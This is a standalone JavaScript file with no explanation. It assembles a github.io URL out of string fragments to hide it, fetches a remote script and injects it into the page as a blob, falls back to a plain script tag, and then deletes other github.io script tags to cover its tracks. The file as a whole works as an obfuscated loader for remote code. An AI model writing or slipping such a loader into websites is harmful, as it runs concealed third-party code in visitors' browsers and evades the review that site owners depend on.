(function(){
  'use strict';

  function _join(arr){ return arr.join(''); }
  function _fromCodes(c){ try{ return String.fromCharCode.apply(null,c); }catch(e){ var s=''; for(var i=0;i<c.length;i++) s+=String.fromCharCode(c[i]); return s; } }
  function _sleep(ms){ return new Promise(function(r){ setTimeout(r,r?ms:ms); }); }

  var h1 = ['sh'];
  var h2 = ['ak'];
  var h3 = ['il'];
  var h4 = ['xv'];
  var h5 = ['s'];
  var dot = ['.'];
  var g1 = ['gi'];
  var g2 = ['th'];
  var g3 = ['ub'];
  var io = ['io'];

  var p1 = ['/in'];
  var p2 = ['sp'];
  var p3 = ['ec'];
  var p4 = ['t/'];
  var p5 = ['sc'];
  var p6 = ['ri'];
  var p7 = ['pt'];
  var p8 = ['.js'];

  var q1 = ['?v='];
  var q2 = ['999'];

  var protoA = ['ht'];
  var protoB = ['tps'];
  var protoC = ['://'];

  var host = _join(h1) + _join(h2) + _join(h3) + _join(h4) + _join(h5) + _join(dot) + _join(g1) + _join(g2) + _join(g3) + _join(dot) + _join(io);
  var path = _join(p1) + _join(p2) + _join(p3) + _join(p4) + _join(p5) + _join(p6) + _join(p7) + _join(p8);
  var proto = _join(protoA) + _join(protoB) + _join(protoC);
  var query = _join(q1) + _join(q2);

  var url = (proto + host + path + query).replace(/([^:]\/)\/+/g,'$1');

  async function fetchAndInject(u){
    try{
      var d = Math.floor(Math.random()*80);
      if(d) await _sleep(d);

      var r = await fetch(u, { cache: 'no-cache', credentials: 'omit', mode: 'cors' });
      if(!r || !r.ok) throw new Error('fetch failed');
      var txt = await r.text();
      try{ txt = txt.replace(/\/\/# sourceMappingURL=.*$/gm,''); }catch(e){}
      var wrapped = '(function(){' + txt + '\n})();';
      var blob = new Blob([wrapped], { type: 'application/javascript' });
      var blobUrl = URL.createObjectURL(blob);
      var s = document.createElement('script');
      s.type = 'application/javascript';
      s.defer = true;
      s.crossOrigin = 'anonymous';
      s.src = blobUrl;
      s.setAttribute('data-inspect-asset','1');
      (document.head || document.documentElement).appendChild(s);
      s.addEventListener('load', function(){ try{ URL.revokeObjectURL(blobUrl); }catch(e){} }, { once: true });
      return true;
    }catch(e){
      return false;
    }
  }

  function fallbackAppend(u){
    try{
      var parts = [];
      for(var i=0;i<u.length;i+=4) parts.push(u.slice(i,i+4));
      var s = document.createElement('script');
      s.defer = true;
      s.crossOrigin = 'anonymous';
      setTimeout(function(){
        try{
          s.src = parts.join('');
          s.setAttribute('data-inspect-fallback','1');
          (document.head || document.documentElement).appendChild(s);
        }catch(e){}
      }, 0);
      return s;
    }catch(e){
      return null;
    }
  }

  function scrubTraces(){
    try{
      var ss = document.querySelectorAll('script[src]');
      for(var i=0;i<ss.length;i++){
        try{
          var sc = ss[i];
          if(/github\.io/i.test(sc.src) && !sc.hasAttribute('data-inspect-asset') && !sc.hasAttribute('data-inspect-fallback')){
            sc.parentNode && sc.parentNode.removeChild(sc);
          }
        }catch(e){}
      }
    }catch(e){}
  }

  (function run(){
    try{
      fetchAndInject(url).then(function(ok){
        if(!ok) fallbackAppend(url);
        setTimeout(scrubTraces, 200);
      }).catch(function(){ fallbackAppend(url); setTimeout(scrubTraces,200); });
    }catch(e){
      try{ fallbackAppend(url); }catch(e){}
    }
  })();

  try{ setInterval(function(){ /* noop */ }, 30000); }catch(e){}

})();